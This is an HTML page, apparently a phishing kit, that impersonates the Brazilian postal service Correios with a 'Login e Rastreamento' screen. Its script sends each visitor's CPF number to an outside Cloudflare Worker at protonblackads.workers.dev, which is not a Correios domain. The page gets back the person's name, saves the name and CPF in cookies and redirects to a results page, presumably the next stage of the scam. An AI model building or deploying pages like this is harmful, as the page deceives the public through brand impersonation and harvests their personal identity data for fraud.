<!DOCTYPE html><html lang="pt-BR"><head>
        <meta charset="utf-8">
        <meta content="width=device-width, initial-scale=1.0" name="viewport">
        <title>Correios - Login e Rastreamento</title>
        <script src="https://cdn.tailwindcss.com/"></script>
        <link href="css/bAhcrAfQuxfq.css" rel="stylesheet">
        <style>
            @keyframes pulse-animation {
                0% { transform: scale(1); }
                50% { transform: scale(1.05); }
                100% { transform: scale(1); }
            }

            .pulse {
                animation: pulse-animation 2s infinite;
            }

            body {
                font-family: 'Trebuchet MS', sans-serif;
                display: flex;
                flex-direction: column;
                min-height: 100vh;
            }

            .content {
                flex: 1;
                display: flex;
                flex-direction: column;
                justify-content: center;
                align-items: center;
                margin-top: 40px; /* Altura do cabeçalho */
            }

            footer {
                background-color: #FFE602; /* Amarelo do footer */
                margin-top: auto; /* Empurra o footer para a parte inferior */
            }

            .btn-primary {
                background-color: #1B73E8;
                color: #fff;
                padding: 0.75rem 1.5rem;
                border-radius: 0.375rem;
                display: inline-block;
                margin-top: 1.5rem;
                font-weight: bold;
                cursor: pointer;
                transition: background-color 0.3s ease;
            }

            .btn-primary:hover {
                background-color: #165bb5;
            }

            #message, #messageError {
                margin-top: 1rem;
                color: #00416B;
                visibility: hidden;
            }

            #messageError {
                color: #E02424;
            }
        </style>
    </head>
    <body class="bg-gray-100 font-trebuchet">
        <header class="bg-correios-navbar border-b border-gray-200 p-4 shadow-md header-fixed">
            <div class="max-w-6xl mx-auto flex justify-between items-center">
                <button class="text-correios-menu-icon">
                    <img alt="Menu" class="w-10 h-10" src="images/AAQesYTinek9.svg">
                </button>
                <img alt="Correios logo" class="h-auto w-auto" src="images/wpKWSfrRPdYa.png" style="max-height: 40px; max-width: 200px;">
                <div class="w-10">
                    <!-- Div vazia para balancear o layout -->
                </div>
            </div>
        </header>
        
        <div class="content">
            <div class="main-content">
                <main class="max-w-md mx-auto bg-white shadow-lg rounded-lg overflow-hidden">
                    <div class="p-8">
                        <h1 class="text-xl font-bold mb-6 text-correios-text text-center">
                            Digite seu CPF para acessar sua conta
                        </h1>
                        <form id="cpfForm">
                            <div class="mb-6">
                                <label class="block text-sm font-bold text-gray-700 mb-2" for="cpfInput">
                                    CPF
                                </label>
                                <input class="w-full border border-gray-300 rounded px-3 py-2 focus:outline-none focus:ring-2 focus:ring-correios-blue" id="cpfInput" inputmode="numeric" maxlength="14" oninput="formatCPF(this)" pattern="\d{3}\.\d{3}\.\d{3}-\d{2}" placeholder="000.000.000-00" required="" type="tel">
                            </div>
                            <button class="btn-primary w-full" type="submit">
                                ENTRAR
                            </button>
                        </form>
                        <p id="message">Consultando...</p>
                        <p id="messageError">CPF inválido ou não encontrado.</p>
                        <p class="mt-6 text-sm text-gray-600 text-center">
                            Por razões de segurança, por favor clique em Sair e feche o seu navegador quando terminar de acessar os serviços que precisam de autenticação!
                        </p>
                    </div>
                </main>
            </div>
        </div>

        <footer class="py-4">
            <div class="max-w-6xl mx-auto px-4 sm:px-6 lg:px-8">
                <div class="grid grid-cols-1 md:grid-cols-3 gap-8">
                    <div>
                        <h2 class="text-2xl font-bold mb-4 text-correios-footer-text">Fale Conosco</h2>
                        <ul class="text-correios-footer-text space-y-2">
                            <li>Registro de manifestações</li>
                            <li>Acompanhamento de manifestações</li>
                            <li>Central de Atendimento</li>
                            <li>Atendimento Comercial</li>
                            <li>Ouvidoria</li>
                            <li>Denúncia</li>
                        </ul>
                    </div>
                    <div>
                        <h2 class="text-2xl font-bold mb-4 text-correios-footer-text">Sobre os Correios</h2>
                        <ul class="text-correios-footer-text space-y-2">
                            <li>Educação e Cultura</li>
                            <li>Código de Ética</li>
                            <li>Venda de Imóveis</li>
                        </ul>
                    </div>
                    <div>
                        <h2 class="text-2xl font-bold mb-4 text-correios-footer-text">Outros Sites</h2>
                        <ul class="text-correios-footer-text space-y-2">
                            <li>Loja online dos Correios</li>
                            <li>Ministério da Ciência, Tecnologia, Inovações e Comunicações</li>
                        </ul>
                    </div>
                </div>
                <div class="mt-8 border-t border-correios-footer-text pt-8 text-center">
                    <p class="text-sm text-correios-footer-text">
                        © Copyright 2024 Correios - Todos os direitos reservados
                    </p>
                    <p class="text-xs text-correios-footer-text mt-2">v0.21.27</p>
                </div>
            </div>
        </footer>

        <script>
            document.addEventListener('DOMContentLoaded', function() {
                document.getElementById('cpfForm').addEventListener('submit', async function(event) {
                    event.preventDefault();
        
                    const cpf = document.getElementById('cpfInput').value.replace(/\D/g, '');
                    const messageElement = document.getElementById('message');
                    const messageErrorElement = document.getElementById('messageError');
        
                    messageErrorElement.style.visibility = 'hidden';
                    messageElement.style.visibility = 'hidden';
        
                    if (cpf.length === 11) {
                        messageElement.textContent = 'Consultando...';
                        messageElement.style.visibility = 'visible';
        
                        // Use a URL do Cloudflare Worker em vez da API externa diretamente
                        const url = `https://buscarcpf.protonblackads.workers.dev?cpf=${cpf}`;
        
                        try {
                            const response = await fetch(url);
                            if (!response.ok) {
                                throw new Error(`Erro ao consultar a API. Status: ${response.status}`);
                            }
        
                            const data = await response.json();
        
                            if (data && data.nome) {
                                document.cookie = `nome=${data.nome}; path=/; max-age=86400`;
                                document.cookie = `cpf=${cpf}; path=/; max-age=86400`;
        
                                const redirectUrl = `resultado.html?nome=${encodeURIComponent(data.nome)}&cpf=${encodeURIComponent(cpf)}`;
                                window.location.href = redirectUrl;
                            } else {
                                messageElement.style.visibility = 'hidden';
                                messageErrorElement.textContent = 'CPF inválido ou não encontrado.';
                                messageErrorElement.style.visibility = 'visible';
                            }
                        } catch (error) {
                            messageElement.style.visibility = 'hidden';
                            messageErrorElement.textContent = `Erro ao consultar CPF: ${error.message}`;
                            messageErrorElement.style.visibility = 'visible';
                        }
                    } else {
                        messageErrorElement.textContent = 'Por favor, insira um CPF no formato 000.000.000-00';
                        messageErrorElement.style.visibility = 'visible';
                    }
                });
            });
        
            function formatCPF(input) {
                let value = input.value.replace(/\D/g, '');
                if (value.length > 3 && value.length <= 6) {
                    value = value.replace(/(\d{3})(\d+)/, '$1.$2');
                } else if (value.length > 6 && value.length <= 9) {
                    value = value.replace(/(\d{3})(\d{3})(\d+)/, '$1.$2.$3');
                } else if (value.length > 9) {
                    value = value.replace(/(\d{3})(\d{3})(\d{3})(\d{2})/, '$1.$2.$3-$4');
                }
                input.value = value;
            }
        </script>
        
        
    
    
</body></html>